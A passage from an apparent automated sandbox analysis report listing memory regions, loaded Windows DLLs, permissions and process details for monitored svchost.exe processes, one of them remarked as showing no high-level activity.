| pagefile_0x000000d39bb60000 | 0xd39bb60000 | 0xd39bb6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xd39bb70000 | 0xd39bb70fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000d39bb80000 | 0xd39bb80000 | 0xd39bb93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39bba0000 | 0xd39bba0000 | 0xd39bc1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39bc20000 | 0xd39bc20000 | 0xd39bc23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d39bc30000 | 0xd39bc30000 | 0xd39bc30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39bc40000 | 0xd39bc40000 | 0xd39bc41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xd39bc50000 | 0xd39bd0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d39bd10000 | 0xd39bd10000 | 0xd39bd10fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39bd20000 | 0xd39bd20000 | 0xd39bd26fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39bd30000 | 0xd39bd30000 | 0xd39bd30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39bdb0000 | 0xd39bdb0000 | 0xd39bdb0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39bdc0000 | 0xd39bdc0000 | 0xd39bdc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39bdd0000 | 0xd39bdd0000 | 0xd39bdd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39bde0000 | 0xd39bde0000 | 0xd39bdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39be00000 | 0xd39be00000 | 0xd39befffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39bf00000 | 0xd39bf00000 | 0xd39bfbffff | Pagefile Backed Memory | r |
|
|
|
- |
| wevtapi.dll | 0xd39bfc0000 | 0xd39c024fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000d39c030000 | 0xd39c030000 | 0xd39c030fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39c040000 | 0xd39c040000 | 0xd39c040fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c050000 | 0xd39c050000 | 0xd39c050fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c060000 | 0xd39c060000 | 0xd39c066fff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c070000 | 0xd39c070000 | 0xd39c0effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39c0f0000 | 0xd39c0f0000 | 0xd39c0f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000d39c100000 | 0xd39c100000 | 0xd39c1fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000d39c200000 | 0xd39c200000 | 0xd39c387fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000d39c390000 | 0xd39c390000 | 0xd39c510fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000d39c520000 | 0xd39c520000 | 0xd39c59ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c5a0000 | 0xd39c5a0000 | 0xd39c61ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c620000 | 0xd39c620000 | 0xd39c71ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c720000 | 0xd39c720000 | 0xd39c79ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c7a0000 | 0xd39c7a0000 | 0xd39c7bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c7c0000 | 0xd39c7c0000 | 0xd39c7dffff | Private Memory | rw |
|
|
|
- |
| pcaevts.dll | 0xd39c7e0000 | 0xd39c7e4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d39c800000 | 0xd39c800000 | 0xd39c8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39c900000 | 0xd39c900000 | 0xd39c9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39ca00000 | 0xd39ca00000 | 0xd39ca7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39ca80000 | 0xd39ca80000 | 0xd39cafffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39cb00000 | 0xd39cb00000 | 0xd39cb7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39cb80000 | 0xd39cb80000 | 0xd39cbfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39cc00000 | 0xd39cc00000 | 0xd39ccfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39cd00000 | 0xd39cd00000 | 0xd39cdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39ce00000 | 0xd39ce00000 | 0xd39cefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39cf00000 | 0xd39cf00000 | 0xd39cffffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xd39d000000 | 0xd39d336fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d39d340000 | 0xd39d340000 | 0xd39d3bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39d3c0000 | 0xd39d3c0000 | 0xd39d4bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39d4c0000 | 0xd39d4c0000 | 0xd39d5bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39d600000 | 0xd39d600000 | 0xd39d6fffff | Private Memory | rw |
|
|
|
- |
| winlogon.exe | 0xd39d700000 | 0xd39d792fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d39d7a0000 | 0xd39d7a0000 | 0xd39d89ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39d900000 | 0xd39d900000 | 0xd39d9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39db00000 | 0xd39db00000 | 0xd39dbfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39dc00000 | 0xd39dc00000 | 0xd39dcfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39dd00000 | 0xd39dd00000 | 0xd39ddfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39de00000 | 0xd39de00000 | 0xd39defffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39df00000 | 0xd39df00000 | 0xd39df7ffff | Private Memory | rw |
|
|
|
- |
| services.exe | 0xd39df80000 | 0xd39dfeffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000d39e000000 | 0xd39e000000 | 0xd39e0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e100000 | 0xd39e100000 | 0xd39e1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e200000 | 0xd39e200000 | 0xd39e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e400000 | 0xd39e400000 | 0xd39e4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e600000 | 0xd39e600000 | 0xd39e6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e700000 | 0xd39e700000 | 0xd39e7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e800000 | 0xd39e800000 | 0xd39e8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000d39e900000 | 0xd39e900000 | 0xd39e9fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff0b0000 | 0x7df5ff0b0000 | 0x7ff5ff0affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff786f4e000 | 0x7ff786f4e000 | 0x7ff786f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f54000 | 0x7ff786f54000 | 0x7ff786f55fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f56000 | 0x7ff786f56000 | 0x7ff786f57fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f58000 | 0x7ff786f58000 | 0x7ff786f59fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f5a000 | 0x7ff786f5a000 | 0x7ff786f5bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f5c000 | 0x7ff786f5c000 | 0x7ff786f5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f5e000 | 0x7ff786f5e000 | 0x7ff786f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f60000 | 0x7ff786f60000 | 0x7ff786f61fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f62000 | 0x7ff786f62000 | 0x7ff786f63fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f64000 | 0x7ff786f64000 | 0x7ff786f65fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f66000 | 0x7ff786f66000 | 0x7ff786f67fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f68000 | 0x7ff786f68000 | 0x7ff786f69fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f6a000 | 0x7ff786f6a000 | 0x7ff786f6bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f6c000 | 0x7ff786f6c000 | 0x7ff786f6dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff786f6e000 | 0x7ff786f6e000 | 0x7ff786f6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff786f70000 | 0x7ff786f70000 | 0x7ff78706ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787070000 | 0x7ff787070000 | 0x7ff787092fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff787093000 | 0x7ff787093000 | 0x7ff787093fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787094000 | 0x7ff787094000 | 0x7ff787095fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787096000 | 0x7ff787096000 | 0x7ff787097fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787098000 | 0x7ff787098000 | 0x7ff787099fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78709a000 | 0x7ff78709a000 | 0x7ff78709bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78709c000 | 0x7ff78709c000 | 0x7ff78709dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78709e000 | 0x7ff78709e000 | 0x7ff78709ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| dbghelp.dll | 0x7ffade4d0000 | 0x7ffade659fff | Memory Mapped File | rwx |
|
|
|
- |
| audioses.dll | 0x7ffae1490000 | 0x7ffae1514fff | Memory Mapped File | rwx |
|
|
|
- |
| deviceaccess.dll | 0x7ffae59b0000 | 0x7ffae59f2fff | Memory Mapped File | rwx |
|
|
|
- |
| wscsvc.dll | 0x7ffaf0480000 | 0x7ffaf04affff | Memory Mapped File | rwx |
|
|
|
- |
| cmintegrator.dll | 0x7ffaf07e0000 | 0x7ffaf07edfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffaf07f0000 | 0x7ffaf0809fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7ffaf0810000 | 0x7ffaf0825fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmcsp.dll | 0x7ffaf0830000 | 0x7ffaf0865fff | Memory Mapped File | rwx |
|
|
|
- |
| wcmsvc.dll | 0x7ffaf0870000 | 0x7ffaf0907fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore6.dll | 0x7ffaf09e0000 | 0x7ffaf0a27fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcore.dll | 0x7ffaf0a30000 | 0x7ffaf0a8cfff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ffaf0ac0000 | 0x7ffaf0acafff | Memory Mapped File | rwx |
|
|
|
- |
| ksuser.dll | 0x7ffaf0ad0000 | 0x7ffaf0ad7fff | Memory Mapped File | rwx |
|
|
|
- |
| audiosrv.dll | 0x7ffaf0ae0000 | 0x7ffaf0bf0fff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffaf0de0000 | 0x7ffaf0f10fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ffaf1420000 | 0x7ffaf1430fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| nrpsrv.dll | 0x7ffaf1950000 | 0x7ffaf1958fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| lmhsvc.dll | 0x7ffaf19a0000 | 0x7ffaf19a9fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtsvc.dll | 0x7ffaf19b0000 | 0x7ffaf1b5afff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x7ffaf1b70000 | 0x7ffaf1b87fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffaf3170000 | 0x7ffaf31a1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffaf31b0000 | 0x7ffaf3231fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ffaf3490000 | 0x7ffaf349bfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffaf3ab0000 | 0x7ffaf3b57fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffaf44e0000 | 0x7ffaf4533fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 19 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #45: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #45 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x358 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
7EC
0x
84C
0x
7C0
0x
7C4
0x
758
0x
614
0x
610
0x
608
0x
414
0x
150
0x
158
0x
3D8
0x
35C
0x
6D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000b40ad50000 | 0xb40ad50000 | 0xb40ad5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xb40ad60000 | 0xb40ad60fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b40ad70000 | 0xb40ad70000 | 0xb40ad83fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40ad90000 | 0xb40ad90000 | 0xb40ae0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b40ae10000 | 0xb40ae10000 | 0xb40ae13fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b40ae20000 | 0xb40ae20000 | 0xb40ae20fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40ae30000 | 0xb40ae30000 | 0xb40ae31fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40ae40000 | 0xb40ae40000 | 0xb40aebffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40aec0000 | 0xb40aec0000 | 0xb40aec0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40aed0000 | 0xb40aed0000 | 0xb40aed0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b40aee0000 | 0xb40aee0000 | 0xb40aee0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40aef0000 | 0xb40aef0000 | 0xb40aef6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40af00000 | 0xb40af00000 | 0xb40affffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xb40b000000 | 0xb40b0bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000b40b0c0000 | 0xb40b0c0000 | 0xb40b0c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40b0d0000 | 0xb40b0d0000 | 0xb40b0d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40b0e0000 | 0xb40b0e0000 | 0xb40b0e0fff | Private Memory | rw |
|
|
|
- |
| mmdevapi.dll.mui | 0xb40b0f0000 | 0xb40b0f0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b40b100000 | 0xb40b100000 | 0xb40b106fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b40b110000 | 0xb40b110000 | 0xb40b1cffff | Pagefile Backed Memory | r |
|
|
|
- |
| audioendpointbuilder.dll.mui | 0xb40b1d0000 | 0xb40b1d0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b40b1e0000 | 0xb40b1e0000 | 0xb40b1e2fff | Private Memory | rw |
|
|
|
- |
| sysmain.dll.mui | 0xb40b1f0000 | 0xb40b1f5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b40b200000 | 0xb40b200000 | 0xb40b2fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000b40b300000 | 0xb40b300000 | 0xb40b487fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000b40b490000 | 0xb40b490000 | 0xb40b610fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40b620000 | 0xb40b620000 | 0xb40b71ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40b720000 | 0xb40b720000 | 0xb40b767fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40b920000 | 0xb40b920000 | 0xb40ba1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40baa0000 | 0xb40baa0000 | 0xb40bb1ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xb40bb20000 | 0xb40be56fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000b40be60000 | 0xb40be60000 | 0xb40bedffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40bee0000 | 0xb40bee0000 | 0xb40bfdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c060000 | 0xb40c060000 | 0xb40c15ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c160000 | 0xb40c160000 | 0xb40c25ffff | Private Memory | rw |
|
|
|
- |
| pfpre_871cf952.mkd | 0xb40c260000 | 0xb40c290fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x000000b40c2a0000 | 0xb40c2a0000 | 0xb40c2a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000b40c320000 | 0xb40c320000 | 0xb40c326fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c360000 | 0xb40c360000 | 0xb40c45ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c4a0000 | 0xb40c4a0000 | 0xb40c4a6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c500000 | 0xb40c500000 | 0xb40c5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c600000 | 0xb40c600000 | 0xb40c6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b40c700000 | 0xb40c700000 | 0xb50c6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50c890000 | 0xb50c890000 | 0xb50c896fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50c900000 | 0xb50c900000 | 0xb50c9fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ca00000 | 0xb50ca00000 | 0xb50cdfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ce00000 | 0xb50ce00000 | 0xb50cf14fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d000000 | 0xb50d000000 | 0xb50d0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d100000 | 0xb50d100000 | 0xb50d1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d3b0000 | 0xb50d3b0000 | 0xb50d4affff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d4b0000 | 0xb50d4b0000 | 0xb50d5affff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d630000 | 0xb50d630000 | 0xb50d636fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d700000 | 0xb50d700000 | 0xb50d7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50d930000 | 0xb50d930000 | 0xb50da2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50dc00000 | 0xb50dc00000 | 0xb50dcfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50dd00000 | 0xb50dd00000 | 0xb50ddfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50de00000 | 0xb50de00000 | 0xb50defffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50df00000 | 0xb50df00000 | 0xb50dffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e000000 | 0xb50e000000 | 0xb50e0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e100000 | 0xb50e100000 | 0xb50e1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e200000 | 0xb50e200000 | 0xb50e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e300000 | 0xb50e300000 | 0xb50e3fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e400000 | 0xb50e400000 | 0xb50e4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e500000 | 0xb50e500000 | 0xb50e5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e700000 | 0xb50e700000 | 0xb50e7fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50e800000 | 0xb50e800000 | 0xb50e8fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ea00000 | 0xb50ea00000 | 0xb50eafffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50eb00000 | 0xb50eb00000 | 0xb50ebfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ec00000 | 0xb50ec00000 | 0xb50ecfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ed00000 | 0xb50ed00000 | 0xb50edfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ee00000 | 0xb50ee00000 | 0xb50eefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50ef00000 | 0xb50ef00000 | 0xb50effffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50f000000 | 0xb50f000000 | 0xb50f0fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50f100000 | 0xb50f100000 | 0xb50f1fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50f200000 | 0xb50f200000 | 0xb50f400fff | Private Memory | rw |
|
|
|
- |
| private_0x000000b50f410000 | 0xb50f410000 | 0xb50f5e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5fff00000 | 0x7df5fff00000 | 0x7ff5ffefffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff787826000 | 0x7ff787826000 | 0x7ff787827fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787828000 | 0x7ff787828000 | 0x7ff787829fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78782e000 | 0x7ff78782e000 | 0x7ff78782ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787830000 | 0x7ff787830000 | 0x7ff787831fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787834000 | 0x7ff787834000 | 0x7ff787835fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787836000 | 0x7ff787836000 | 0x7ff787837fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78783a000 | 0x7ff78783a000 | 0x7ff78783bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78783c000 | 0x7ff78783c000 | 0x7ff78783dfff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787840000 | 0x7ff787840000 | 0x7ff78793ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787940000 | 0x7ff787940000 | 0x7ff787962fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff787963000 | 0x7ff787963000 | 0x7ff787964fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787967000 | 0x7ff787967000 | 0x7ff787968fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787969000 | 0x7ff787969000 | 0x7ff78796afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78796b000 | 0x7ff78796b000 | 0x7ff78796cfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78796d000 | 0x7ff78796d000 | 0x7ff78796efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff78796f000 | 0x7ff78796f000 | 0x7ff78796ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| wer.dll | 0x7ffae0030000 | 0x7ffae00cdfff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerclient.dll | 0x7ffae5cf0000 | 0x7ffae5cfafff | Memory Mapped File | rwx |
|
|
|
- |
| ncbservice.dll | 0x7ffae60c0000 | 0x7ffae6117fff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffae8710000 | 0x7ffae8752fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
